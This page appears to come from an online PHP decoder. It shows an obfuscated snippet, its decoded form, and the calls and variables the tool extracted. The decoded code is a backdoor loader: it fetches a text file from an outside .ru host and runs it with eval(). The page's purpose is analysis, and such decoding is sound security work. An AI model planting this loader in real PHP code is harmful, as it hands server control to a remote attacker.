Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php ini_set('display_errors','Off');error_reporting('E_ALL');$b=base64_decode('aHR0cDovL..

Decoded Output download

<?php ini_set('display_errors','Off');error_reporting('E_ALL');$b=base64_decode('aHR0cDovL3R1cmJvLXJhc2tydXRrYS5ydS93b3JrLnR4dA==');$q=$_GET['q'];if($q)$b.=base64_decode('P3E9').$q;$d=file_get_contents($b);eval($d); ?>

Did this file decode correctly?

Original Code

<?php ini_set('display_errors','Off');error_reporting('E_ALL');$b=base64_decode('aHR0cDovL3R1cmJvLXJhc2tydXRrYS5ydS93b3JrLnR4dA==');$q=$_GET['q'];if($q)$b.=base64_decode('P3E9').$q;$d=file_get_contents($b);eval($d); ?>

Function Calls

ini_set 1
base64_decode 1
error_reporting 1
file_get_contents 1

Variables

$b http://turbo-raskrutka.ru/work.txt
$d
$q None

Stats

MD5 c994e08b7c0a30efc8a91d329104afd8
Eval Count 1
Decode Time 384 ms